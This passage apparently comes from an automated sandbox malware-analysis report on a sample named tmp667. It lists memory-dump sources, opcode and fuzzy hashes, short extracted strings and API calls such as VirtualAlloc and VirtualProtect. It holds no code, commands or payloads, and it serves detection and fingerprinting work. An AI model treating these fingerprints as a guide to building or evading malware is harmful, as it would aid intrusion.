                                                                                                • Instruction Fuzzy Hash: 5921A674A016288FDB64DF28D858BDABBF1BB4A301F5041EAD90EA7260DB305E84CF51

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$0$$
                                                                                                • API String ID: 0-2365821624
                                                                                                • Opcode ID: 04702c5b753c765933a7dd8ad8ea6a47ec8935bbfac384347ff936f8516903e3
                                                                                                • Instruction ID: 04a2966c1b6508ad622022106385ad06cca826f45ba6533719390ea0ad72af7c
                                                                                                • Opcode Fuzzy Hash: 04702c5b753c765933a7dd8ad8ea6a47ec8935bbfac384347ff936f8516903e3
                                                                                                • Instruction Fuzzy Hash: D4E04F71C1624CAFE706EBA49921B9E7BA9EB16344F1044F6D808D7251EA315E18CBD2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$d
                                                                                                • API String ID: 0-1322973597
                                                                                                • Opcode ID: c293839f873bcd637f5f36a997ab5302267ecd4d3c026c3763db852b0a5d7031
                                                                                                • Instruction ID: b17e9ec0d7d3e1b2b9bc04ec629f5fffe34586bf5785db6ef647036b0bd8bd67
                                                                                                • Opcode Fuzzy Hash: c293839f873bcd637f5f36a997ab5302267ecd4d3c026c3763db852b0a5d7031
                                                                                                • Instruction Fuzzy Hash: 53D16A346006058FCB24CF68C494EAAB7F2FF99310B25896DD85A9B361DB30FC46CB94
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: |*6$oV
                                                                                                • API String ID: 0-932278511
                                                                                                • Opcode ID: 305e78cd60b4da7c8ff78c3767a920cd5dc7d074106a6868fd05165035a51d38
                                                                                                • Instruction ID: 76f6963f4c17926f813ad4c0d2e71bac5dfaec1a4166da76a35ae9f6ab3e7a1c
                                                                                                • Opcode Fuzzy Hash: 305e78cd60b4da7c8ff78c3767a920cd5dc7d074106a6868fd05165035a51d38
                                                                                                • Instruction Fuzzy Hash: 22B10974E04218CFDB54DFA4D854BADBBF6EB49300F2090AAE41AAB395CB345D85CF11
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$H!p
                                                                                                • API String ID: 0-1960402415
                                                                                                • Opcode ID: 2ff18419673284651cf58688d9ed3ba71607af054581d1aa3e6325890895e9a6
                                                                                                • Instruction ID: ec4dc332afc3ec3c1a9a82d5ab99f74b1c2246025d54bdea56f43d3e843eb221
                                                                                                • Opcode Fuzzy Hash: 2ff18419673284651cf58688d9ed3ba71607af054581d1aa3e6325890895e9a6
                                                                                                • Instruction Fuzzy Hash: 3C518B303143108FDB29AB34D86562E7BA3AF85301B25457EE906CB3A5CF35AC06CB66
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TJ"p$oV
                                                                                                • API String ID: 0-2444350933
                                                                                                • Opcode ID: 04d6ea82c79f656f6f1d867b62eb3bb26da2f956a310b8c36595d2589554bcba
                                                                                                • Instruction ID: d1f25ae8405a2b1638ef870b4513d08ddfa01bc8478a3474a6d92f1ef28e6407
                                                                                                • Opcode Fuzzy Hash: 04d6ea82c79f656f6f1d867b62eb3bb26da2f956a310b8c36595d2589554bcba
                                                                                                • Instruction Fuzzy Hash: 22711CB4E04208DFDB44EFA8E59469EBBB6FB99300F20802AE415A7398DB745D46CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TJ"p$oV
                                                                                                • API String ID: 0-2444350933
                                                                                                • Opcode ID: a7b26038d0380266fde0b35e6c57b585c89b6926b22ae3640db21b46da36aa5a
                                                                                                • Instruction ID: aac2a34fea4063b4b3baae378d56483dace570ef88c42205c793de6cbd56b794
                                                                                                • Opcode Fuzzy Hash: a7b26038d0380266fde0b35e6c57b585c89b6926b22ae3640db21b46da36aa5a
                                                                                                • Instruction Fuzzy Hash: 02711A74E04208DFDB44EFA8E59469EBBB6FB99300F20802AE415B7398DB746D46DF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$$"
                                                                                                • API String ID: 0-3959713478
                                                                                                • Opcode ID: ceede31568ca6f680ceb2dd6ff8164b89dda642ca9d32d08af82c5187000e256
                                                                                                • Instruction ID: fa419e2187d3f1f1d9345a4e27b27d8f4d19393417c4dcf8175e49200e66deb5
                                                                                                • Opcode Fuzzy Hash: ceede31568ca6f680ceb2dd6ff8164b89dda642ca9d32d08af82c5187000e256
                                                                                                • Instruction Fuzzy Hash: 4521A274A016288FDB64DF28E858BDABBF1BB4A301F5041E9E50EA7260DB305E80CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.452343355.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_5400000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5$oV
                                                                                                • API String ID: 0-3111449219
                                                                                                • Opcode ID: 44dd4ab95cec8463ba898760afca732d47e3f707fbeddc3d643e624795f88b06
                                                                                                • Instruction ID: 52ae2524823aab02aef58aac348ed1d7146091273a9a35838577d1123004c2c3
                                                                                                • Opcode Fuzzy Hash: 44dd4ab95cec8463ba898760afca732d47e3f707fbeddc3d643e624795f88b06
                                                                                                • Instruction Fuzzy Hash: B611E578A05228CFCB65EF18D948A99B7F5FB89300F1090E6A84DA7788DB345F81CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$0
                                                                                                • API String ID: 0-203156872
                                                                                                • Opcode ID: 7be2e430d99cdbbcce6e9859cf5de52a92697309b0c42610900447191bb4999d
                                                                                                • Instruction ID: 1c335ae3da504c034e36a4cef39acd111d4a2b47fee8f4c61bf4074789d5bc94
                                                                                                • Opcode Fuzzy Hash: 7be2e430d99cdbbcce6e9859cf5de52a92697309b0c42610900447191bb4999d
                                                                                                • Instruction Fuzzy Hash: A0F01C74D05248EFC740DFA8D95579DBBB5EB49304F10C5EA8C1893341EA359E06CF91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.452343355.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_5400000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$oV
                                                                                                • API String ID: 0-2291984414
                                                                                                • Opcode ID: e970c49d6638413a1d612efccf4434fc904ebc6e271fa023b9111b683f124c88
                                                                                                • Instruction ID: e4fddcce267682ee8c4caa2993a0792e0b01bc0fba76d724a5f8f7a974666208
                                                                                                • Opcode Fuzzy Hash: e970c49d6638413a1d612efccf4434fc904ebc6e271fa023b9111b683f124c88
                                                                                                • Instruction Fuzzy Hash: 99F030746081148FD765EF68D858A9AB7B6EB89304F1050E6A51DA7385CB349F91CF10
                                                                                                APIs
                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0498DDE4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.451858888.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_4980000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 6a995981c4c3c389641b8511b9e3b515d374ba7647d7042fa8e91c09ce7100b0
                                                                                                • Instruction ID: f70335fd00785d36bdc546c2030d8654c69769eb1e7ba2834ca9f2e1186818c7
                                                                                                • Opcode Fuzzy Hash: 6a995981c4c3c389641b8511b9e3b515d374ba7647d7042fa8e91c09ce7100b0
                                                                                                • Instruction Fuzzy Hash: 4631A7B8D002089FDF14CFA9D984AEEFBB1BF49310F20942AE814BB210D735A945CF54
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446542643.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6f0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: c35d2401191e240c33774ef4a1905e4622588735c0bcdad786dcac494ecf4562
                                                                                                • Instruction ID: 9105d9ee88aabaa1852992cef8cf586348d82a8ddf2603e842dcb05e0e1c47a0
                                                                                                • Opcode Fuzzy Hash: c35d2401191e240c33774ef4a1905e4622588735c0bcdad786dcac494ecf4562
                                                                                                • Instruction Fuzzy Hash: B931CCB4D012189FDB10CFA9D984AEEFBF5BF49310F24942AE804B7210C735A945CF55
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 54e1e440b9225e6f85b985e8dbd0dc3a7d06499aaf9f9f8ff88bdf4f35124b39
                                                                                                • Instruction ID: 07887359e6001096c45e8478543e8b74ae62f5db65aeecb3c12c4a1744b672fa
                                                                                                • Opcode Fuzzy Hash: 54e1e440b9225e6f85b985e8dbd0dc3a7d06499aaf9f9f8ff88bdf4f35124b39
                                                                                                • Instruction Fuzzy Hash: 82C11770B002148FDB04DF69C894AAEBBF6AF89311F1540A9E905DF3A5DB70DD45CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: a4c01ba4660d9c0156d07adb4d07ffa4e051cf3261ed74f546d5dad6dbb74e51
                                                                                                • Instruction ID: cc9535de10f755d5058b118e1e7b5f4305c27b53255dc1fa7c73e91728d7eaeb
                                                                                                • Opcode Fuzzy Hash: a4c01ba4660d9c0156d07adb4d07ffa4e051cf3261ed74f546d5dad6dbb74e51
                                                                                                • Instruction Fuzzy Hash: 8DE1FAB4A05218CFDB54EFA5D884BEDB7B6FB89300F2090AAE509A7359DB305D85CF11
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(70D67560,00000001,00000000,00000000), ref: 004242BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446025452.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_420000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p
                                                                                                • API String ID: 0-2763268518
                                                                                                • Opcode ID: 3b0cb89b481537ce7f0c394dcde756e72477aae54e84f8ce6b8e5db6ddcc0c31
                                                                                                • Instruction ID: 4c5fdcd491e052feb1eb33535c5d7e52e1d6eed31d18be54df584c9cfa8ce890
                                                                                                • Opcode Fuzzy Hash: 3b0cb89b481537ce7f0c394dcde756e72477aae54e84f8ce6b8e5db6ddcc0c31
                                                                                                • Instruction Fuzzy Hash: C051F431A006268FCB01CF68C494A6AFBB1FF85311B1587AAED159B251D730EC56CBE5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p
                                                                                                • API String ID: 0-1059414960
                                                                                                • Opcode ID: f64f8236d7ef31b6b00f7123c11206195a48b84c82470f740f1c89888f2183e4
                                                                                                • Instruction ID: 502b449b742a5461cd8dc835ccfbf939432bd306587d2ef325f426e6a746340a
                                                                                                • Opcode Fuzzy Hash: f64f8236d7ef31b6b00f7123c11206195a48b84c82470f740f1c89888f2183e4
                                                                                                • Instruction Fuzzy Hash: 50519D757002108FDB14DF69D895A6EBBE2EF89321B15817AEA05CB361DB31EC05CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: p!p
                                                                                                • API String ID: 0-1147775804
                                                                                                • Opcode ID: 6aa5d39c5958095fb98eec5aae58bffd0b4099a06903461e9f5d5705149f2276
                                                                                                • Instruction ID: 850a14e49a22d434d7491c80d01cd53a95c7828a4c36e109a0ba38c95c784efd
                                                                                                • Opcode Fuzzy Hash: 6aa5d39c5958095fb98eec5aae58bffd0b4099a06903461e9f5d5705149f2276
                                                                                                • Instruction Fuzzy Hash: 13515E76610110AFCB459FA8C915D697BB3FF8D31471A80A9F2099B372CB32DC21EB60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 1c48b403c630dbb271ffad8b68cbdca762d0b31fdb148385d54dde320e27f4a1
                                                                                                • Instruction ID: 09c2357581e425a4aaacc6c8120f03f90a1573cd2d2838b8c238a698770afab8
                                                                                                • Opcode Fuzzy Hash: 1c48b403c630dbb271ffad8b68cbdca762d0b31fdb148385d54dde320e27f4a1
                                                                                                • Instruction Fuzzy Hash: D34112B4D14658DBCB14DFA8D850AEDB7B6FF8A300F10822AE415B7364DB70A982CB40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: fdad5ef4115c834181192dd25d3b6ead3935e318f342fc08a857dcf4a86d8910
                                                                                                • Instruction ID: cbab45cee561e4392edc0ebbad8f1e599f82d1e5216871e9ddc3f0902b74f044
                                                                                                • Opcode Fuzzy Hash: fdad5ef4115c834181192dd25d3b6ead3935e318f342fc08a857dcf4a86d8910
                                                                                                • Instruction Fuzzy Hash: E75156B8901218CFDB50EFA8D884BEDB7B6FB49300F2051AAE819A7399D7745D85CF41
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oOI
                                                                                                • API String ID: 0-15478488
                                                                                                • Opcode ID: fa57c8e685213cfe82c49d0f2162ae406965faa16647e5396e856ef547b194b6
                                                                                                • Instruction ID: ee8e567c89f360f8c35a112ae97e2ec8b26de609cea8615a3137260ad1f697be
                                                                                                • Opcode Fuzzy Hash: fa57c8e685213cfe82c49d0f2162ae406965faa16647e5396e856ef547b194b6
                                                                                                • Instruction Fuzzy Hash: 8851B374E01208DFDB18DFA9D598AEDBBB2BF89300F20912AE415AB360DB359945CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: dfdb0af9f299f0c40b09da61c89221f1c1e1312dd08638663011088971a774b7
                                                                                                • Instruction ID: f91e2f8d55143a05f586dd34bcfae016a979b512a1e6ebc40aa418eca3efe302
                                                                                                • Opcode Fuzzy Hash: dfdb0af9f299f0c40b09da61c89221f1c1e1312dd08638663011088971a774b7
                                                                                                • Instruction Fuzzy Hash: 064106B4D14618DBCB14DFA9D850AEDB7B6FF89310F10912AE415B7354DB70A986CF40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 492fa0e9d54cb69dcc0f0b9e5c264bdd16c423adfae0ab68897c687e202079bd
                                                                                                • Instruction ID: 8593abf19cfb66e396b0945880ce0ef39d5415f97a0b5e4fa2f2335f4fc9574a
                                                                                                • Opcode Fuzzy Hash: 492fa0e9d54cb69dcc0f0b9e5c264bdd16c423adfae0ab68897c687e202079bd
                                                                                                • Instruction Fuzzy Hash: 43415478A051188FCB95EF28E85479977BAFB8D300F2041E6E51AA7399CB709F818F50
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0498EFA7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.451858888.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_4980000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: d22c82871976aa9bb1cfd66aeb30ca9a2da13b846a14b7f116cdb43d9624eadc
                                                                                                • Instruction ID: 4cf7a0e5f723c8c7e4dbb9e0750ff1061959a6eadcc779773ae48b65fb159ed9
                                                                                                • Opcode Fuzzy Hash: d22c82871976aa9bb1cfd66aeb30ca9a2da13b846a14b7f116cdb43d9624eadc
                                                                                                • Instruction Fuzzy Hash: 4E314D70905208DFD744EFA8D488BBEBBF5FB9A304F2180A9D015B3654DB748A85DF11
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 276cc04033f6d9ec11f47949c3d3bb2fcb158d741960a2680df40727e7457790
                                                                                                • Instruction ID: 2e12b2e03a3567535f3ce66e754337933653c80c59c7b6541b6641c3136b5098
                                                                                                • Opcode Fuzzy Hash: 276cc04033f6d9ec11f47949c3d3bb2fcb158d741960a2680df40727e7457790
                                                                                                • Instruction Fuzzy Hash: 1841CDB8A05228CFD7A4EF24D85179DB7BAFB89300F1081EA954DA7749DB305E81DF41
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ILuV
                                                                                                • API String ID: 0-1855505789
                                                                                                • Opcode ID: d270ca9b6cfd0ff43b8de514eb6c0f8e1cbc94d03456d4c753eb17376dde8837
                                                                                                • Instruction ID: 1669f14a3bf6704ecfac7a4236ef35c650f3dd37160bd7d9614e8d1cdadb3f58
                                                                                                • Opcode Fuzzy Hash: d270ca9b6cfd0ff43b8de514eb6c0f8e1cbc94d03456d4c753eb17376dde8837
                                                                                                • Instruction Fuzzy Hash: B721AEB4E04208CFCB04DFA9D540AEEB7F6EB88300F20D065D419A7354DB359982CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 9c2c25e360f4aad8c7288972150cca2c621089a364cecb03bd4f9c6603d09c59
                                                                                                • Instruction ID: 38ffac20378fa9cde841df4bc284a6bd3959124cb3087a9c4e4603cc9a072009
                                                                                                • Opcode Fuzzy Hash: 9c2c25e360f4aad8c7288972150cca2c621089a364cecb03bd4f9c6603d09c59
                                                                                                • Instruction Fuzzy Hash: 4E216BB4D082488FDB40DFA8D8547EEBBB6FB8A304F10806AD011B3295C77859898F12
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: d27b5829784cf6ac14cf91acf60f5588161dbc669e5f62ddce210691a141bcbc
                                                                                                • Instruction ID: 01644c5898bcd17db756fad7d57e124f7e4acf49805ebed417911ef08a7cec76
                                                                                                • Opcode Fuzzy Hash: d27b5829784cf6ac14cf91acf60f5588161dbc669e5f62ddce210691a141bcbc
                                                                                                • Instruction Fuzzy Hash: F4214AB4E04209DBDB40EFE8D8447EEB7B6FB89304F108469D025B3384D7745A899F51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 856c11104749bd4575cf90506aa6f80a979b60b51322833d2283de5d0ed4caad
                                                                                                • Instruction ID: 65f23c6e724a53cb892f713d782a5264ddbe3b715f68280fe2b5e894561ddfe9
                                                                                                • Opcode Fuzzy Hash: 856c11104749bd4575cf90506aa6f80a979b60b51322833d2283de5d0ed4caad
                                                                                                • Instruction Fuzzy Hash: 9C216870D09608CFDB04DFA9D8186EEBBB6EB8D300F50902AC01AB3764D7748A45CFA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: a52fb7c553c018b6d114f333591f6f09c8f4af950a43dad9de5703bcca9872df
                                                                                                • Instruction ID: 43645accb8cc1623f2e884e91a2813020b4ec7eb3507aef37ae918f5f632384c
                                                                                                • Opcode Fuzzy Hash: a52fb7c553c018b6d114f333591f6f09c8f4af950a43dad9de5703bcca9872df
                                                                                                • Instruction Fuzzy Hash: 8531E5B4D05318CFDB60CFA8C944BECBBF6AB09304F2050AAD519AB395D7765A85DF00
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 4a17ca00fd080889b98b136410c3ee11a7fa8c70f9eae92e92cd4fa04da9bbcf
                                                                                                • Instruction ID: cfeacc2f1718adbcb79585acc4cf2618adab1bc033ea2380985c2f14004c2ca3
                                                                                                • Opcode Fuzzy Hash: 4a17ca00fd080889b98b136410c3ee11a7fa8c70f9eae92e92cd4fa04da9bbcf
                                                                                                • Instruction Fuzzy Hash: B121F8B8A04258CFDB61EF64D94479DB7B1FB49304F2080A6941AB3798CBB45DC1DF20
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 9a76dfc5bf21f7290731695b0e7e5ca0b2727a98d0466a38e1b2c0e9b14cf4bf
                                                                                                • Instruction ID: 3552af22d2afc483bfcf25742ee3c8b4464d2820e5e35c9fefeb5bbbd68edbdf
                                                                                                • Opcode Fuzzy Hash: 9a76dfc5bf21f7290731695b0e7e5ca0b2727a98d0466a38e1b2c0e9b14cf4bf
